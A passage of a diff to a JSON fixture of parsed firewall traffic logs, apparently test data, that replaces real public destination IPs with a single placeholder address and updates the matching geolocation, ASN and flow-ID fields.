States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -12806,27 +12928,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 192, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 2 }, "rule": { @@ -12845,7 +12969,7 @@ "packets": 2, "ip": "192.168.15.196" }, - "message": "192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12860,7 +12984,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12882,7 +13006,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:Cc+ekkpKaB3f2BPdSyd/esY/QVI=" + "community_id": "1:x1R9iKG6gpfTr38oGDxd94TaJfw=" } }, "sequence_number": 32091189, @@ -12902,8 +13026,8 @@ ], "network": { "community_id": [ - "1:E2LqiKHR3ZQXGMA0QsH84jNNC/0=", - "1:Cc+ekkpKaB3f2BPdSyd/esY/QVI=" + "1:ZXjKRdtLBmEkac907R8hepJQAgc=", + "1:x1R9iKG6gpfTr38oGDxd94TaJfw=" ], "transport": "udp", "application": "dns", @@ -12943,14 +13067,14 @@ ], "ip": [ "192.168.15.196", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942121144Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031849100Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -12972,27 +13096,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 208, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13011,7 +13137,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13026,7 +13152,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13048,7 +13174,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:uPFYX4KL/wjyCp4kt+08v7myT3w=" + "community_id": "1:KACwzOgJLPdAmFb3AUQwHtScx8A=" } }, "sequence_number": 32091190, @@ -13068,8 +13194,8 @@ ], "network": { "community_id": [ - "1:wZXxVANJq0JID3j0Sh2o/qnIa7A=", - "1:uPFYX4KL/wjyCp4kt+08v7myT3w=" + "1:8KNguHP76fjqnY2FMkcbeO9WBCk=", + "1:KACwzOgJLPdAmFb3AUQwHtScx8A=" ], "transport": "udp", "application": "dns", @@ -13109,14 +13235,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942124628Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031854500Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -13138,27 +13264,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 100, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13177,7 +13305,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13192,7 +13320,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13214,7 +13342,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:f3vxOCmoOo/FOLV6VRqKjZ7eUVE=" + "community_id": "1:uPSyttH6wPoIrM2ANku8B7uB8Ek=" } }, "sequence_number": 32091191, @@ -13234,8 +13362,8 @@ ], "network": { "community_id": [ - "1:GzSDvCcBuprowvf40RNRaGTOn+A=", - "1:f3vxOCmoOo/FOLV6VRqKjZ7eUVE=" + "1:S1I23bkB/fNp16aIx8LE9+qfQMI=", + "1:uPSyttH6wPoIrM2ANku8B7uB8Ek=" ], "transport": "udp", "application": "dns", @@ -13275,14 +13403,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942128144Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031859900Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -13304,29 +13432,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.185.88.112" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.2481, - "lat": 38.6583 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 7237, - "ip": "35.185.88.112", + "ip": "175.16.199.1", "packets": 11 }, "rule": { @@ -13345,7 +13473,7 @@ "packets": 13, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13360,7 +13488,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.185.88.112" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -13382,7 +13510,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:/rmnQ6QBbJzgkfNBrkCgvu5UHiU=" + "community_id": "1:jS5fmx0Jyid6wJJzRz5/FTP7Y8s=" } }, "sequence_number": 32091192, @@ -13402,8 +13530,8 @@ ], "network": { "community_id": [ - "1:WVDXvoZNkWqELBhlp2DzAjKS6V4=", - "1:/rmnQ6QBbJzgkfNBrkCgvu5UHiU=" + "1:7eLAq1McW/s++i3m8QhCi8RWLe8=", + "1:jS5fmx0Jyid6wJJzRz5/FTP7Y8s=" ], "transport": "tcp", "application": "ssl", @@ -13443,14 +13571,14 @@ ], "ip": [ "192.168.15.224", - "35.185.88.112", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 10000000000, - "ingested": "2021-09-08T12:40:05.942147240Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031864200Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -13472,27 +13600,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 109, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13511,7 +13641,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13526,7 +13656,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13548,7 +13678,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:9Ub1pskil4C0tLo85OJa61g1D0Q=" + "community_id": "1:zKOYj65ZfonGNEeED/C8WsAzNdo=" } }, "sequence_number": 32091193, @@ -13568,8 +13698,8 @@ ], "network": { "community_id": [ - "1:SaW9SLCHEmuQYbHgbCLPVZmIrWo=", - "1:9Ub1pskil4C0tLo85OJa61g1D0Q=" + "1:SqvoGARqG3vB8IQsDqwWVdoya4g=", + "1:zKOYj65ZfonGNEeED/C8WsAzNdo=" ], "transport": "udp", "application": "dns", @@ -13609,14 +13739,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942151013Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031868700Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -13639,27 +13769,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 116, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13678,7 +13810,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13693,7 +13825,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13715,7 +13847,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:rh7nCIUBzUAekx4F+OTwBbpRh+E=" + "community_id": "1:hn4GD+5fvFkKh5CY1I/tGUl70ps=" } }, "sequence_number": 32091194, @@ -13735,8 +13867,8 @@ ], "network": { "community_id": [ - "1:UKGEn5x2xKPJhb0aLNUd3IM2xP0=", - "1:rh7nCIUBzUAekx4F+OTwBbpRh+E=" + "1:BnKHQDJv1OGtE9i+aGd3gRM75p8=", + "1:hn4GD+5fvFkKh5CY1I/tGUl70ps=" ], "transport": "udp", "application": "dns", @@ -13776,14 +13908,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942154637Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031874200Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -13806,27 +13938,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 96, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13845,7 +13979,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13860,7 +13994,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13882,7 +14016,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:eIIc+AXkJtZLyfNqUAVZLumaYVQ=" + "community_id": "1:MBYdQDSxHvBa6iAwYROKM5oT9cM=" } }, "sequence_number": 32091195, @@ -13902,8 +14036,8 @@ ], "network": { "community_id": [ - "1:7WDGZhY7X3GTZLGCIDWzxK5juF4=", - "1:eIIc+AXkJtZLyfNqUAVZLumaYVQ=" + "1:rLkKmC5eKNwFkylsF3ox4VOALUI=", + "1:MBYdQDSxHvBa6iAwYROKM5oT9cM=" ], "transport": "udp", "application": "dns", @@ -13943,14 +14077,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942158276Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031879700Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -13973,30 +14107,29 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 654, - "ip": "50.19.85.24", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -14015,7 +14148,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": 